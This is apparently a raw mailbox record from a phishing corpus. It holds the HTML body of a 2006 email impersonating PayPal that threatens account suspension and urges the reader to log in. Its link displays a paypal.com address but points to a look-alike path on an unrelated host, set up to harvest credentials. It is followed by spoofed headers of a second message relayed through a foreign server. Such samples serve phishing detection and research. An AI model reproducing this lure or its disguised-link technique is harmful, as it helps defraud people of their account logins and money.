From: PayPal <service-us@paypal.com>
Content-Type: text/html
Status: O
X-Status: 
X-Keywords:                  
X-UID: 277



						<img src="http://www.paypalobjects.com/en_US/i/header/header_girlBike_589x133.jpg" border="0" NOSEND="1"></div>
					<p><font face="Verdana" size="2">Dear valued <strong>PayPal<sup></sup></strong> 
					member</font>: <br>
					<br>
&nbsp;</p>
					<p><font face="Verdana" size="2">Identity protection 
					matters. And <strong>PayPal<sup></sup></strong> works day 
					and night to help keep your identity safe. That's why it has 
					come to our attention that your <strong>PayPal<sup></sup></strong> 
					account information needs to be updated as part of our 
					continuing commitment to protect your account and to reduce 
					the instance of fraud on our website. If you could take 5-10 
					minutes out of your online experience and update your 
					personal records you will not run into any future problems 
					with the online service.<br>
&nbsp;</font></p>
					<p><font face="Verdana" size="2">However, failure to update 
					your records will result in account suspension.<br>
&nbsp;</font></p>
					<p><font face="Verdana" size="2">Once you have updated your 
					account records, your <strong>PayPal<sup></sup></strong> 
					session will not be interrupted and will continue as normal.</font></p>
					<p><font face="Verdana" size="2">To login to your <strong>
					PayPal<sup></sup></strong> account and update your records 
					click on the following link:<br>
&nbsp;</font></p>
					<a 
href="http://esalud1.innova-auria.com/www.paypal.com/.cgi_bin/webscr=cmd=_home/login.html" 
target="_top">
					<font face="Verdana" color="#0000ff" size="2">
					https://www.paypal.com/cgi-bin/webscr?cmd=_login-run</font></a><br>
&nbsp;<p><font face="Verdana" size="2">Thank You for using PayPal!<br>
&nbsp;</font></p>
					<p><font face="Verdana" size="2">The <strong>PayPal</strong><sup></sup> 
					Team</font></p>
					<table width="100%" border="0">
						<tr>
							<td width="57%">
							<img src="http://www.paypal.com/en_US/i/logo/paypal_logo.gif" border="0" NOSEND="1"></td>
							<td width="43%">
							<img height="80" src="https://www.paypalobjects.com/en_US/i/email/email_ts_120x80.gif" width="120" NOSEND="1"></td>
						</tr>
					</table>
					<font face="Verdana" size="2">
					<p>
					-----------------------------------------------------------------------------------</p>
					<p>Accounts Management will periodically send you 
					information about site changes and enhancements, as outlined 
					in our User Agreement.</p>
					<p>
					-----------------------------------------------------------------------------------</p>
					<p>Please do not reply to this email. This mailbox is not 
					monitored and you will not receive a response. For 
					assistance, log in to your PayPal account and click the Help 
					link located in the top right corner of any PayPal page.</p>
					<p>
					-----------------------------------------------------------------------------------</p>
					<p>PayPal Limited is authorised and regulated by the 
					Financial Services Authority in the United States as an 
					electronic money institution.</p>
					<p>PayPal Email ID PP359</font></td>

From customer.service@paypal.com  Tue Jan 24 03:39:25 2006
Return-Path: <customer.service@paypal.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.1.2.3])
	by naughty.example.com (Postfix) with ESMTP id 36632536EBB
	for <nobody@login.example.com>; Tue, 24 Jan 2006 03:39:25 -0500 (EST)
Received: from server155.baitop.net (unknown [222.96.156.155])
	by mail1.example.com (Postfix) with ESMTP id 4B9BF6CCF0B
	for <nobody@example.com>; Tue, 24 Jan 2006 03:39:24 -0500 (EST)
Received: from User ([193.227.227.219])
	(authenticated)
	by server155.baitop.net (8.11.6/8.11.6) with ESMTP id k0O7gnG26224;
	Tue, 24 Jan 2006 16:42:54 +0900
Message-Id: <200601240742.k0O7gnG26224@server155.baitop.net>
